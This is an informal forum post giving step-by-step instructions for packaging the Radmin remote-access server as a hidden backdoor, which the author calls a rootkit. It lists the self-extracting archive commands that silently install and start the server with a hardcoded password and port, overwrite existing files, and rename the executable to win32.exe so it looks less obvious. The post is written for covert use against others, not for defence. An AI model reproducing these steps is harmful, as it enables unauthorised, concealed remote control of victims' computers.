Written By Insanity
Alright this is a way of making a rootkit with the radmin server.
There are to files in the rar. there is Radmin.exe and Radmin2.exe
These programs are quite simple to make and doens't take much will power to do eather.
*NOTE, with both files you need Admdll.dll and raddrv.dll because they are mandatory dll's that you need to run the r_server service
Radmin.exe Okay for radmin.exe this is what you can do, you get your files r_server, Admdll.dll, raddrv.dll and Radmin.reg (*Note, to get radmin.reg with the settings you want you have to install the server on your computer first and then grab the settins from the registry) So for the default registry in radmin.exe they tray icon is disabled and has a default password and port. So you make a .rar (Using Winrar) and in the comments your going to want to put Path=NetMeeting SavePath Setup=regedit.exe /s Radmin.reg Setup=r_server.exe /pass:Insanity /port:60023 /install /silence Setup=r_server.exe /start Silent=1 Overwrite=2 For path=netmeeting that means that it is going to install in the programfiles netmeeting folder. Save Path is just so everything that u execute after that is taking place there Setup=regedit.exe /s Radmin.exe silently adds your registry files that you got Setup=R_server.exe /pass:Insanity /port:60023 /silence, Okay This is a Big thing, If you setup your registry file with the password port you want then you can use that instead of this step and that way your password and port will be encrypted and you can completely forget that step altogether Setp=r_server.exe /start starts up the program Silent=1 keeps everything silent and Overwrite=2 will overwrite anything that is already in that folder.
Radmin2.exe is basically the exact same but doenst have a radmin.reg because it just uses the dfault settings and then saves the password and port via Setup=win32.exe /pass:Insanity /port:60023 /save /silence and make sure u do Setup=win32.exe /install /silence (That /install is important because that installs it as a service as opposed to jsut running it) This way is simpler but your pasword etc are not encrypted. R_server.exe is renamed to win32.exe and can be renamed to anything you want to make it less obvoius of what it is :)
There are ways to spice this up using bat files and hct and masking a service name etc but you can figure out how to do that youself..
Edit* Can you please move this into the right sectoin if this isn't the right place to put it thank you